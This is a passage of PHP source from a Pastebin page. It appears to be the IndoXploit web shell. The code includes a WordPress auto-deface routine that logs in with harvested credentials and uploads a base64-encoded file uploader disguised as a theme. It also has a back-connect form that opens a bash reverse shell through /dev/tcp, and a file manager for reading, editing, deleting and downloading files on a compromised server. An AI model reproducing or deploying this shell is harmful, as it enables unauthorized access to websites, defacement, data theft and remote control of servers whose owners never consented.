  1326. $site = "$target/wp-login.php";
  1327. $site2 = "$target/wp-admin/theme-install.php?upload";
  1328. $b1 = anucurl($site2);
  1329. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1330. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1331. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1332. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1333. $www = "m.php";
  1334. $fp5 = fopen($www,"w");
  1335. fputs($fp5,$upload3);
  1336. $post2 = array(
  1337. "_wpnonce" => "$anu2",
  1338. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1339. "themezip" => "@$www",
  1340. "install-theme-submit" => "Install Now",
  1341. );
  1342. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1343. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1344. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1345. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1346. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1347. curl_setopt($ch, CURLOPT_POST, 1);
  1348. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1349. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1350. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1351. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1352. $data3 = curl_exec($ch);
  1353. curl_close($ch);
  1354. $y = date("Y");
  1355. $m = date("m");
  1356. $namafile = "id.php";
  1357. $fpi = fopen($namafile,"w");
  1358. fputs($fpi,$script);
  1359. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1360. curl_setopt($ch6, CURLOPT_POST, true);
  1361. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1362. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1363. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1364. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1365. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1366. $postResult = curl_exec($ch6);
  1367. curl_close($ch6);
  1368. $as = "$target/k.php";
  1369. $bs = anucurl($as);
  1370. if(preg_match("#$script#is", $bs)) {
  1371. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1372. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1373. } else {
  1374. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1375. echo "[!!] coba aja manual: <br>";
  1376. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1377. echo "[+] username: <font color=lime>$user</font><br>";
  1378. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1379. }
  1380. mysql_close($conn);
  1381. }
  1382. }
  1383. } else {
  1384. echo "<center><h1>WordPress Auto Deface V.2</h1>
  1385. <form method='post'>
  1386. Link Config: <br>
  1387. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  1388. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1389. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1390. </form></center>";
  1391. }
  1392. } elseif($_GET['do'] == 'network') {
  1393. echo "<center><form method='post'>
  1394. Back Connect: <br>
  1395. <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'><br>
  1396. <input type='text' placeholder='port' name='port_bc' value='6969'><br>
  1397. <input type='submit' name='sub_bc' value='Reverse' style='width: 210px;'>
  1398. </form>";
  1399. if(isset($_POST['sub_bc'])) {
  1400. $ip = $_POST['ip_bc'];
  1401. $port = $_POST['port_bc'];
  1402. exe("/bin/bash -i >& /dev/tcp/$ip/$port 0>&1");
  1403. }
  1404. echo "</center>";
  1405. } elseif($_GET['act'] == 'newfile') {
  1406. if($_POST['new_save_file']) {
  1407. $newfile = htmlspecialchars($_POST['newfile']);
  1408. $fopen = fopen($newfile, "a+");
  1409. if($fopen) {
  1410. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1411. } else {
  1412. $act = "<font color=red>permission denied</font>";
  1413. }
  1414. }
  1415. echo $act;
  1416. echo "<form method='post'>
  1417. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1418. <input type='submit' name='new_save_file' value='Submit'>
  1419. </form>";
  1420. } elseif($_GET['act'] == 'newfolder') {
  1421. if($_POST['new_save_folder']) {
  1422. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1423. if(!mkdir($new_folder)) {
  1424. $act = "<font color=red>permission denied</font>";
  1425. } else {
  1426. $act = "<script>window.location='?dir=".$dir."';</script>";
  1427. }
  1428. }
  1429. echo $act;
  1430. echo "<form method='post'>
  1431. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1432. <input type='submit' name='new_save_folder' value='Submit'>
  1433. </form>";
  1434. } elseif($_GET['act'] == 'rename_dir') {
  1435. if($_POST['dir_rename']) {
  1436. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1437. if($dir_rename) {
  1438. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1439. } else {
  1440. $act = "<font color=red>permission denied</font>";
  1441. }
  1442. echo "".$act."<br>";
  1443. }
  1444. echo "<form method='post'>
  1445. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1446. <input type='submit' name='dir_rename' value='rename'>
  1447. </form>";
  1448. } elseif($_GET['act'] == 'delete_dir') {
  1449. $delete_dir = rmdir($dir);
  1450. if($delete_dir) {
  1451. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1452. } else {
  1453. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1454. }
  1455. echo $act;
  1456. } elseif($_GET['act'] == 'view') {
  1457. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1458. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1459. } elseif($_GET['act'] == 'edit') {
  1460. if($_POST['save']) {
  1461. $save = file_put_contents($_GET['file'], $_POST['src']);
  1462. if($save) {
  1463. $act = "<font color=lime>Saved!</font>";
  1464. } else {
  1465. $act = "<font color=red>permission denied</font>";
  1466. }
  1467. echo "".$act."<br>";
  1468. }
  1469. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1470. echo "<form method='post'>
  1471. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1472. <input type='submit' value='Save' name='save' style='width: 500px;'>
  1473. </form>";
  1474. } elseif($_GET['act'] == 'rename') {
  1475. if($_POST['do_rename']) {
  1476. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1477. if($rename) {
  1478. $act = "<script>window.location='?dir=".$dir."';</script>";
  1479. } else {
  1480. $act = "<font color=red>permission denied</font>";
  1481. }
  1482. echo "".$act."<br>";
  1483. }
  1484. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1485. echo "<form method='post'>
  1486. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1487. <input type='submit' name='do_rename' value='rename'>
  1488. </form>";
  1489. } elseif($_GET['act'] == 'delete') {
  1490. $delete = unlink($_GET['file']);
  1491. if($delete) {
  1492. $act = "<script>window.location='?dir=".$dir."';</script>";
  1493. } else {
  1494. $act = "<font color=red>permission denied</font>";
  1495. }
  1496. echo $act;
  1497. } elseif(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  1498. @ob_clean();
  1499. $file = $_GET['file'];
  1500. header('Content-Description: File Transfer');
  1501. header('Content-Type: application/octet-stream');
  1502. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  1503. header('Expires: 0');
  1504. header('Cache-Control: must-revalidate');
  1505. header('Pragma: public');
  1506. header('Content-Length: ' . filesize($file));
  1507. readfile($file);
  1508. exit;
  1509. } else {
  1510. if(is_dir($dir) == true) {
  1511. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1512. <tr>
  1513. <th class="th_home"><center>Name</center></th>
  1514. <th class="th_home"><center>Type</center></th>
  1515. <th class="th_home"><center>Size</center></th>
  1516. <th class="th_home"><center>Last Modified</center></th>
  1517. <th class="th_home"><center>Permission</center></th>
  1518. <th class="th_home"><center>Action</center></th>
  1519. </tr>';
  1520. $scandir = scandir($dir);
  1521. foreach($scandir as $dirx) {
  1522. $dtype = filetype("$dir/$dirx");
  1523. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1524. if(!is_dir("$dir/$dirx")) continue;
  1525. if($dirx === '..') {
  1526. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1527. } elseif($dirx === '.') {
  1528. $href = "<a href='?dir=$dir'>$dirx</a>";
  1529. } else {
  1530. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1531. }
  1532. if($dirx === '.' || $dirx === '..') {
  1533. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1534. } else {
  1535. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1536. }
  1537. echo "<tr>";
  1538. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  1539. echo "<td class='td_home'><center>$dtype</center></td>";
  1540. echo "<td class='td_home'><center>-</center></th>";
  1541. echo "<td class='td_home'><center>$dtime</center></td>";
  1542. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1543. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1544. }
  1545. echo "</tr>";
  1546. foreach($scandir as $file) {
  1547. $ftype = filetype("$dir/$file");
  1548. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1549. $size = filesize("$dir/$file")/1024;
  1550. $size = round($size,3);
  1551. if($size > 1024) {
  1552. $size = round($size/1024,2). 'MB';
  1553. } else {
  1554. $size = $size. 'KB';
  1555. }
  1556. if(!is_file("$dir/$file")) continue;
  1557. echo "<tr>";
  1558. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1559. echo "<td class='td_home'><center>$ftype</center></td>";
  1560. echo "<td class='td_home'><center>$size</center></td>";
  1561. echo "<td class='td_home'><center>$ftime</center></td>";
  1562. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1563. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1564. }
  1565. echo "</tr></table><hr>";
  1566. } else {
  1567. echo "<font color=red>can't open directory</font>";
  1568. }
  1569. echo "<center>Copyright &copy; ".date("Y")." - <a href='http://forum.indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font></a></center>";
  1570. }
  1571. ?>
  1572. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!